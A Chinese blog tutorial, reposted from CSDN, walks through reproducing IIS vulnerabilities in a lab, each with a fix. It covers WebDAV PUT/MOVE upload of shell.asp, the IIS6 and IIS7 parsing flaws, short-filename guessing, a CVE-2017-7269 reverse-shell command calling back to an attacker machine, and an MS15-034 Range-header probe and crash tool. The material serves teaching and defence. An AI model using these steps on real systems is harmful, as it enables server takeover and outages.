0


IIS漏洞大全(附修复方法)

IIS6.0

IIS6.0任意文件写入

 IlS Server 在 Web 服务扩展中开启了 WebDAV,配置了可以写入的权限,造成任意文件上传。

漏洞复现

fofa:"llS-6.0" or
本地搭建2003 server
1)开启 WebDAV 和写权限:


做好准备工作后开启环境,然后我们去访问配置的IP,访问到如下页面

然后开启抓包刷新页面,在抓到的数据包后将其发送到重放器,将请求方式改为OPTIONS后点击发送,在返回包中就可以看到可以使用的请求方式

这里可以直接用PUT方式上传文件,但是不能上传脚本文件,所以为了上传脚本,我们可以先上传一个普通的1.txt文件,然后利用move方式将其改名为脚本文件的格式

其中PUT /后面跟上我们要上传的文件名,然后在最后一行写上我们要上传的文件的内容,将多余的请求数据都删除,只留下请求头,host以及长度和内容,然后点击发送,出现201则上传成功

我们回到靶机中刷新查看也发现上传成功

然后将请求方式改为MOVE后,将数据包改为如下内容后再次点击上传,shell.asp是想改为的名字

MOVE /2.txt HTTP/1.1
Host: 192.168.159.131
Destination: http://192.168.159.131/shell.asp

我们到靶机中查看,成功上传

漏洞修复

1.关闭webdav ;

2.关闭写⼊权限 。

IIS6.0解析漏洞

在iis6.x版本中存在可以将任意文件当作asp文件解析的漏洞,我们在网站目录下创建一个名为1.asp的文件夹,则在其中的任何文件都会当作asp文件去运行,如下

先在默认网站中右键,点击打开

然后在这里创建一个1.asp的文件夹,再创建一个内容为<%=now()%>(这个函数为查看当前时间)的txt文件,将1.txt放入1.asp中,然后用物理机去访问,即可得到当前时间

用ipconfig查看虚拟机IP后去物理机访问192.168.209.133/1.asp/1.txt

二.IIS6.x(2)

  当我们在网站目录下创建一个名为1.asp.;.jpg的文件,内容同样为<%=now()%>,当我们去访问时,也会得到当前时间,这证明该文件虽然后缀名为jpg,但是他也会被当作asp文件运行。

IIS短⽂件漏洞

Windows 以 8.3 格式⽣成与 MS-DOS 兼容的(短)⽂件名,以允许基于 MS-DOS 或 16

位 Windows的程序访问这些⽂件。在cmd下输⼊" dir /x"即可看到短⽂件名的效果。

原理

当后缀⼩于4时,短⽂件名产⽣需要⽂件(夹)名前缀字符⻓度⼤于等于9位。

当后缀⼤于等于4时,⽂件名前缀字符⻓度即使为1,也会产⽣短⽂件名。

⽬前IIS⽀持短⽂件名猜测的HTTP⽅法主要包括:DEBUG、OPTIONS、GET、POST、HEAD、

TRACE六种; IIS 8.0之后的版本只能通过OPTIONS和TRACE⽅法被猜测成功。

漏洞复现

IIS8.0以下版本需要开启ASP.NET⽀持,IIS>=8.0版本,即使没有安装ASP.NET,通过OPTIONS和TRACE⽅法也可以猜解成功。以下通过开启IIS6.0 ASP.NET后进⾏复现。

在这里,我们可以看到有短文件 

短⽂件名特征

  1. 只显示前6位的字符,后续字符⽤~1代替。其中数字1是可以递增。如果存在⽂件名类似的⽂

    件,则前⾯的 6个字符是相同的,后⾯的数字进⾏递增。

  1. 后缀名最⻓只有3位,超过3位的会⽣成短⽂件名,且后缀多余的部分会截断。

  1. 所有⼩写字⺟均转换成⼤写的字⺟ ;

  1. ⻓⽂件名中包含多个” . ”的时候,以⽂件最后⼀个” . ”作为短⽂件名的后缀;

  1. ⻓⽂件名前缀/⽂件夹名字符⻓度符合0-9和A-Z、a-z范围且需要⼤于等于9位才会⽣成短⽂

    件名,如果包含空格或者其他部分特殊字符,不论⻓度均会⽣成短⽂件。

使⽤payload验证⽬标是否存在IIS短⽂件名漏洞,显示的404,说明⽬标存在该短⽂件名:

通过浏览器访问⼀个不存在的短⽂件名,会返回400状态码, 400说明该⽂件不存在:

根据上面测试可以说明⽬标存在IIS短⽂件漏洞 ;

判断漏洞存在后,接下来⼿⼯详细分析猜解IIS短⽂件名:

以 abcde11123354566.txt⽂件为例,分别访问 : /a*1*/a.aspx ;/b*1*/a.aspx

 可以发现,a开头的文件因为存在,所以显示404,b开头的文件因为不存在,所以显示badrequest,我们接着猜文件名第二位, 

 aa不存在,我们尝试ab,ab存在 

 之后的就按照这样一步一步试所有的字母与数字 


 而文件后缀名要在~1后面尝试,我们先输入.a,返回badrequest,说明ab开头的文件后缀名不是a开头的 

 我们再尝试t,返回404,则ab开头的文件后缀名第一个字母是t 

 也是,按照字母顺序一个一个尝试,最后试出文件名与后缀 

下面是IIS短⽂件名扫描软件,获取⽬标存在哪些短⽂件名;

⼯具:https://github.com/lijiejie/IIS_shortname_Scanner

⽤法:python2 iis_shortname_Scan.py http://192.168.159.131/

漏洞防御

  1. 升级.net framework ;

  2. 修改注册表键值:

a. HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem 修改

NtfsDisable8dot3NameCreation为1。

b. 修改完成后,需要重启系统⽣效。

c. 命令⾏关闭 fsutil behavior set disable8dot3 1 。

d. 新建⽂件 aaaaaaaaaaaaaazzzzz.txt 已经没有短⽂件名了。

e. 注:此⽅法只能禁⽌NTFS8.3格式⽂件名创建,已经存在的⽂件的短⽂件名⽆法移除,需

要重新复制才会消 失。如果不重新复制,已经存在的短⽂件名则是不会消失的。

f. 将web⽂件夹的内容拷⻉到另⼀个位置,如c:\www到c:\ww,然后删除原⽂件夹,再重

命名c:\ww到 c:\www。

IIS RCE-CVE-2017-7269

   Microsoft windows Server 2003 R2中的 Interne信息服务IIS6.0中的 WebDAV服务中的 

ScStoragePathFromUrl函数中的缓冲区溢出允许远程攻击者通过以 If:<http:// 开头的⻓标头执

⾏任意代码 PROPFIND请求。

**影响范围 **

  WiNdows Server 2003 R2上使⽤IIS6.0并开启 WebDAV扩展。

漏洞复现-反弹shell

同样的,我们再windowserver2003中的iis服务

这里需要用到一个工具,下载链接为:https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269

将其下载到kali中后,利用如下命令运行工具

python2 '/root/Desktop/iis6-exploit-2017-CVE-2017-7269-master/iis6-exploit-2017-CVE-2017-7269-master/iis6 reverse shell' 192.168.159.131 80 192.168.159.129 4455 

其中第一个ip是我们靶机的ip,也就是server2003的IP,第二个ip为攻击机-也就是kali的IP,以及kali开启监听的端口,开启监听后直接运行命令,稍微等待后即可成功反弹到shell

漏洞防御

1.关闭 WebDav服务 ;

2.升级 ;

3.部署安全设备 。

IIS 7x

IIS7⽂件解析漏洞

在IIS7.0和IIS7.5版本下也存在解析漏洞,在默认Fast-CGI开启状况下,在一个文件路径/xx.jpg后面加上/xx.php会将/xx.jpg/xx.php 解析为 php 文件。接下来我们尝试复现,首先打开配置文件php.ini,查找cgi.fix_pathinfo=1,将前面的分号;删除

  然后到网站目录下创建一个名为1.jpg的文件,右键用记事本打开,内容改为<?php phpinfo(); ?>,保存后访问

  在url后面加上/1.jpg/.php,这个jpg文件就会被当作php文件去运行

HTTP.SYS远程代码执⾏(MS15-034) MS-->Microsoft 2015 -034

    HTTP.SYS是Microsoft Windows处理HTTP请求的内核驱动程序,为了优化IIS服务器性能, 

从IIS6.0引 ⼊,IIS服务进程依赖HTTP.SYS

    HTTP.SYS远程代码执⾏漏洞实质是HTTP.SYS的整数溢出漏洞,当攻击者向受影响的 Windows系统发送 特殊设计的HTTP 请求,HTTP.sys 未正确分析时就会导致此漏洞,成功利⽤ 

此漏洞的攻击者可以在系统 帐户的上下⽂中执⾏任意代码。

    主要存在Windows+IIS的环境下,任何安装了微软IIS 6.0以上的Windows Server 2008 

R2/Server 2012/Server 2012 R2以及Windows 7/8/8.1操作系统都受到这个漏洞的影响验证这

个漏洞。

漏洞复现

这次我们去windowserver2012中开启iis服务作为我们的靶机

访问网站后开启抓包再次访问,即可抓到数据包 

在抓到的数据包中,我们加入 

Range: bytes=0-18446744073709551615字段后发送,如果返回416Requested Range Not Satisfiable,则存在HTTP.SYS远程代码执⾏漏洞

这里我们使用一个工具,其 

可以造成⼀个ddos的效果,下载链接:
https://github.com/davidjura/MS15-034-IIS-Active-DoS-Exploit-PoC

 在终端运行,使用python3  

填上地址,端⼝,以及一个存在的图片,这里默认的主⻚图⽚ iis8.5的是(iis-85.png),其他的可以根据百度查,每个版本的欢迎⻚都不⼀样,选择 y

然后就可以看到我们的靶机变卡了,甚至蓝屏 

漏洞修复

安装修复补丁(KB3042553)


本文转载自: https://blog.csdn.net/C233333235/article/details/141000346
版权归原作者 Atopos` 所有, 如有侵权,请联系我们删除。

“IIS漏洞大全(附修复方法)”的评论:

还没有评论